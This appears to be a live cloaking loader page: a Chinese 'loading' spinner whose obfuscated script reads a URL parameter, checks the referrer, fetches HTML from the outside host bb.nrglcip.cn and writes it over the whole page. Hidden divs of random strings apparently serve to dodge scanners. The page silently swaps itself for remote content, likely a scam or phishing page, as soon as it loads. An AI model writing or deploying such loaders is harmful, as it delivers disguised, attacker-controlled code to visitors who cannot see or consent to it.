<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .H4qXnhLQLn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .H4qXnhLQLn .aeqOAzn8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .H4qXnhLQLn .content {
            line-height: 50px;
            text-align: center
        }

        .H4qXnhLQLn .img {
            width: 100%
        }

        .H4qXnhLQLn .a7y4vSH {
            text-align: center
        }

        .H4qXnhLQLn .a7y4vSH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .H4qXnhLQLn .a7y4vSH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .H4qXnhLQLn .a7y4vSH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .H4qXnhLQLn .a7y4vSH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .H4qXnhLQLn .a7y4vSH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .H4qXnhLQLn .a7y4vSH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .H4qXnhLQLn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DcEVaBXeMuCb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hybKdm = DcEVaBXeMuCb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hybKdm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hybKdm +".html?a=share";
		}
		
        SqWMaZPN8P=url+"#"+new Date().getTime();
        SqWMaZPN8P && function() {
            $.get(SqWMaZPN8P, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>rwLyVLCuLXn76QB7LSjfYrqB5b10q4vDIk</div>
<div style='display:none'>rwLyVLCuLXn76QB7LSjfYrqB5b10q4vDIk</div>
<b style='display:none' >KPZAdv2q5HWx23ruU4FJWatTu</b>
<p  style='display:none'>XWGU9p0AnlqydobounNiyvZel6Ct5lvLwcWP2feDSMMn9bMJzH5yFO5uwfS8rh</p>
<div style='display:none'>rwLyVLCuLXn76QB7LSjfYrqB5b10q4vDIk</div>
<b style='display:none' >KPZAdv2q5HWx23ruU4FJWatTu</b>
<b style='display:none' >KPZAdv2q5HWx23ruU4FJWatTu</b>
<span style='display:none'>KLLdTBKbPwgiLtdU7wY73p55</span>
<ul style='display:none' >UiadfVWwujab9SO2DJceoR7OxThRmLjPgsalQTho193nL65RpjbK7HulGXjfb</ul><div class="H4qXnhLQLn">
    <div class="aeqOAzn8">
        <div class="a7y4vSH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>tsE9ex3AtKV</p>
<h1 style='display:none' >saF49TZzOFeNsq1qbX9rKbd8ku6Nebq4t3o5gwWTpgKvzh</h1>
<ul style='display:none' >SMlNAboxG97J1X2Nd0AOOhyz4eK4o6QwCk8hYqmrdoEhbtMzDjlcIy0gAslt9x0N73dwYg</ul>
<div style='display:none'>vGZqOBRNjAWd5nTnl27q6CunUGcs35sWNAofXiyGdc1tZckqtM35UMSROggAIoAby24iMraSKelBq1KeblP53x0AbygJ5V0</div>
<div style='display:none'>vGZqOBRNjAWd5nTnl27q6CunUGcs35sWNAofXiyGdc1tZckqtM35UMSROggAIoAby24iMraSKelBq1KeblP53x0AbygJ5V0</div>
<div style='display:none'>vGZqOBRNjAWd5nTnl27q6CunUGcs35sWNAofXiyGdc1tZckqtM35UMSROggAIoAby24iMraSKelBq1KeblP53x0AbygJ5V0</div>
<b style='display:none' >JgZtQQz7TtQemWwSQCfYLzKMYX5UTcHmD03M68Xla</b></body>
</html>